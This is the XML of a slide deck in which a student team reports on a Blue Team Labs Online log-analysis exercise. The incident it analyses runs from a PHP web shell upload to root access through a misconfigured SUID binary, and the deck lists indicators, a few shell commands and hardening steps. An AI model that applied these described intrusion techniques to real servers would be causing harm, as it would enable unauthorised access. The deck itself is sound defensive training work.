            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Audit SUID Binaries: Regularly scan for dangerous binaries with -perm -4000.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Least Privilege Principle: Remove SUID permissions from binaries that don’t require them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Log Monitoring: Set up alerts for access to sensitive paths like /etc/shadow.</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LESSON LEARNT FROM THIS EXERCISE……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>TABLE OF CONTENT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642910" y="2071678"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>SUMMARY OF THE SCENARIO </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> LOG  FILES EXAMINED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>STEP-BY-STEP ATTACK TIMELINE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>INDICATORS OF COMPROMISE (IOCS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>ROOT CAUSE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>COMMANDS USED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>APPLICATION OF COMMANDS  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>CHALLENGES FACED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>ACTION STEPS TO PREVENT FUTURE INCIDENTS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0" smtClean="0"/>
              <a:t>Lessons You Learned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> CONCLUSION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rmAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>WHAT DID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>WE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> LEARNT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM THE EXERCISE???   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>From this exercise we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>discovered how an attacker can access a PHP server without authorization by abusing privileges. The attacker tried to access sensitive data by moving laterally within the system using privilege escalation techniques. I learned from this exercise how crucial it is to keep an eye on user permissions, secure server configurations, and spot odd activity quickly in order to stop data breaches.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CONCLUSION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This incident demonstrates how a minor web misconfiguration paired with a misconfigured system binary can lead to total server compromise. Proactive monitoring, hardened configurations, and restricted permissions are critical to preventing similar breaches.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00034" y="2071678"/>
            <a:ext cx="8229600" cy="2428892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>THANK YOU</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> SUMMARY OF THE SCENARIO </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sensitive information was stored on a breached Linux server. The actions taken by the attacker to gain access, elevate privileges, and obtain data are described in this report. A PHP-based website's weak file upload feature allowed for initial access. A misconfigured SUID binary gave the attacker the ability to execute a Python-based shell as root, thereby achieving privilege escalation.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0" y="2357430"/>
            <a:ext cx="9144000" cy="2000264"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LOG  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FILES EXAMINED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">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6738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LOG  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FILES EXAMINED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture Placeholder 4" descr="Screenshot_2025-07-03_06_26_11.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1071546"/>
            <a:ext cx="9144000" cy="4786321"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5857868"/>
            <a:ext cx="9144000" cy="1000132"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>bash_history file extracted from the compromised server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6000" r="-2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566738"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LOG  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FILES EXAMINED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Challenge scenario description from Blue Team Labs Online</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture Placeholder 6" descr="photo_2025-07-04_22-15-52.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="207" b="207"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1714500" y="1500188"/>
            <a:ext cx="5486400" cy="3786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28596" y="1714488"/>
            <a:ext cx="8229600" cy="2928958"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>STEP-BY-STEP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ATTACK TIMELINE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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5000" r="-2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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>INITIAL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ACCESS: WEB SHELL UPLOAD</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642910" y="1928802"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The attacker uploaded a malicious PHP web shell (test.php) to the server through an insecure upload form.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Key Indicators: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cd html/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cd uploads/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ls `-la</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>These commands suggest the attacker navigated to the upload directory, confirming the file was successfully uploaded.</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1072</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>135</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INCIDENT REPORT  LOG ANALYSIS – PRIVILEGE ESCALATION </vt:lpstr>
      <vt:lpstr>TEAM ONE MEMBERS NAMES</vt:lpstr>
      <vt:lpstr>TABLE OF CONTENT</vt:lpstr>
      <vt:lpstr> SUMMARY OF THE SCENARIO </vt:lpstr>
      <vt:lpstr>LOG  FILES EXAMINED</vt:lpstr>
      <vt:lpstr>LOG  FILES EXAMINED</vt:lpstr>
      <vt:lpstr>LOG  FILES EXAMINED</vt:lpstr>
      <vt:lpstr>STEP-BY-STEP ATTACK TIMELINE</vt:lpstr>
      <vt:lpstr>INITIAL ACCESS: WEB SHELL UPLOAD</vt:lpstr>
      <vt:lpstr>ESTABLISHING A SHELL</vt:lpstr>
      <vt:lpstr>PRIVILEGE ESCALATION RECONNAISSANCE</vt:lpstr>
      <vt:lpstr>EXPLOITING SUID MISCONFIGURATION</vt:lpstr>
      <vt:lpstr>GAINING ROOT ACCESS</vt:lpstr>
      <vt:lpstr>CLEAN-UP</vt:lpstr>
      <vt:lpstr>INDICATORS OF COMPROMISE (IOCS)</vt:lpstr>
      <vt:lpstr>IOC TYPE INDICATOR</vt:lpstr>
      <vt:lpstr>ROOT CAUSE</vt:lpstr>
      <vt:lpstr>ROOT CAUSE</vt:lpstr>
      <vt:lpstr>COMMANDS USED</vt:lpstr>
      <vt:lpstr>LIST OF COMMANDS USED </vt:lpstr>
      <vt:lpstr>Application of commands </vt:lpstr>
      <vt:lpstr>Application of commands </vt:lpstr>
      <vt:lpstr>Application of commands </vt:lpstr>
      <vt:lpstr>Application of commands </vt:lpstr>
      <vt:lpstr>CHALLENGES FACED</vt:lpstr>
      <vt:lpstr>CHALLENGES FACED DURRING THE EXERCISE</vt:lpstr>
      <vt:lpstr>ACTION STEPS TO PREVENT FUTURE INCIDENTS</vt:lpstr>
      <vt:lpstr>ACTION STEPS TO PREVENT FUTURE INCIDENTS</vt:lpstr>
      <vt:lpstr>LESSON LEARNT FROM THIS EXERCISE……</vt:lpstr>
      <vt:lpstr>WHAT DID WE LEARNT FROM THE EXERCISE???   </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One (1)</dc:title>
  <dc:creator>Daniel adejokun</dc:creator>
  <cp:lastModifiedBy>Daniel adejokun</cp:lastModifiedBy>
  <cp:revision>45</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-04T13:12:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-05T00:32:23Z</dcterms:modified>
</cp:coreProperties>
</file>